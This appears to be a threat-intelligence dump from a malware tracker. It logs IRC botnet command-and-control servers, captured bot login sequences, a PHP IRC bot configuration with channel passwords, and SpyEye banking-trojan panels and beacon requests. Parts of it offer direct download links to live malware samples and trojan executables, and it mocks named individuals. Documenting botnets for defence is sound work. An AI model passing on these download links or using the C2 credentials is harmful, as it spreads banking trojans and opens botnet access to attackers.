Resolved : [www.chatcity2011.net] To [176.53.19.44]
Resolved : [www.chatcity2011.net] To [176.53.19.45]

Remote Host        Port Number
176.53.19.44       81 (irc here)
213.131.252.251    80
74.206.242.164     80

NICK [N00_USA_XP_2228330]
PRIVMSG [N00_USA_XP_2228 @ :scan; Trying to get external IP.
USER SP2-988 * 0 :COMPUTERNAME
@ :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes
212.58.8.78(irc botnet hosted in Turkey Istanbul Doruk Iletisim Ve Otomasyon Sanayi Ve Ticaret A.s)
Remote Host        Port Number
212.58.8.78        4244

NICK new[iRooT-XP-USA]296933
USER 3378 "" "TsGh" :3378
PONG :6DFC6C82
JOIN #!bt!# sk1

hosting infos: http://whois.domaintools.com/212.58.8.78
85.17.180.218(irc botnet hosted in Netherlands Amsterdam Leaseweb B.v)
Remote Host        Port Number
85.17.180.218      7775

NICK {XPUSA338226}
PONG irc.foonet.com
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA338226} -ix
JOIN #karakirli
MODE #karakirli -ix

UPDATE:
NICK n{Ganja-USA|XP}011539
PRIVMSG #c :http://www.r0kettube.com/kategori/Fantazi-Porno Has Been Visited!
USER 0115 "" "TsGh" :0115
JOIN #o3
PRIVMSG #d :http://www.r0kettube.com/kategori/Hemsire-Porno Has Been Visited!
JOIN #a,#b,#c,#d,#e,#f,#g,#h,# ,#j,#k,#l (null)
PRIVMSG #e :http://r0kettube.com/eski-porno-filmi.html Has Been Visited!
74.117.56.213(irc botnet hosted in United States Union City Psychz Networks)
Remote Host        Port Number
74.117.56.213      2319

PASS charm@nte!
NICK [NEW][USA]COMPUTERNAME|49470
USER [NEW][USA]COMPUTERNAME|49470 [NEW][USA]COMPUTERNAME|49470 [NEW][USA]COMPUTERNAME|49470 [NEW][USA]COMPUTERNAME|49470
JOIN ##WAREZ## charm@nte~!~
PONG :ur.now.afraid.org

hosting infos: http://whois.domaintools.com/74.117.56.213
116.126.143.141(ngrBot hosted in Korea, Republic Of Seoul Hanaro Telecom)
Remote Host        Port Number
116.126.143.141    3922 PASS 441
213.251.170.52     80
50.22.66.188       80

NICK n{US|XPa}kttdoir
USER kttdoir 0 0 :kttdoir
JOIN #alfa …
PRIVMSG #alfa :[DNS]: Blocked 1259 domain(s) – Redirected 0 domain(s)

hosting infos: http://whois.domaintools.com/116.126.143.141
211.60.155.2(linux bots hosted in Korea, Republic Of Ulsan Dacom Corp)
var $config = array("server"=>"211.60.155.2",
                    "port"=>"9999",
                    "pass"=>"",
                    "prefix"=>"syik",
                    "maxrand"=>"4",
                    "chan"=>"#setoran",
                    "chan2"=>"#setoran",
                    "key"=>"setoran",
                    "modes"=>"+p",
                    "password"=>"setoran",
                    "trigger"=>".",
                    "hostauth"=>"racrew");

hosting infos: http://whois.domaintools.com/211.60.155.2
21mb malware samples
A lot of SpyEye variants and other banking trojans, IRC bots, worms, etc.
Download: http://adf.ly/1xAh4
theimageshare.com (bfbot creator reborn? iserdo using SpyEye, hosted in Netherlands Amsterdam Snel Internet Services B.v)
Spy Eye Panel: http://theimageshare.com/kurac/
Spy Eye Sample: http://89.207.135.198/pas.exe
http://adf.ly/1x8Rp just in case first link is removed

Websites used to infect people:
butterflysolutions.net ??? iserdo need money ?
imageshare.cc
iserdo.net ???? lol
popusi.biz

HTTP Queries
HTTP Query Text:
theimageshare.com GET /kurac/gate.php?guid=User!SANDBOXB!38BA2BE7&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&cpu=100&ccrc=FADB319B&md5=e47f5cbd0ae6d17cbeb5530db3f9779f HTTP/1.1
privathosting.be/~ishigo/(Spy Eye Banking Trojan hosted in Viet Nam Layer 2 -customer Nework Of Vtdc)
ishigo is a poor French lamer; he's known on carding boards.
Exe File: http://privathosting.be/~ishigo/ptcmd.exe
Avira fails to detect this:

File name    Result
ptcmd.exe    FALSE POSITIVE

The file 'ptcmd.exe' has been classified as 'FALSE POSITIVE'. This means that this file is not dangerous and that this was an erroneous report on our part. The detection pattern
HTTP malware
DNS Queries
DNS Query Text:
www.agriturismoraggiodisole.com IN A +
www.agit.com.br IN A +
www.ameagaru.fr IN A +

HTTP Queries
HTTP Query Text:
www.agriturismoraggiodisole.com POST /files/filtect.php HTTP/1.0
www.agit.com.br POST /apuracao/filtect.php HTTP/1.0
www.ameagaru.fr POST /memo/filtect.php HTTP/1.0

DNS Queries
DNS Query Text:
www.allahskanan.net IN A +
www.groupe-cogit.com IN A +
fercon.ro IN A +
demo.ckentgroup.com IN A +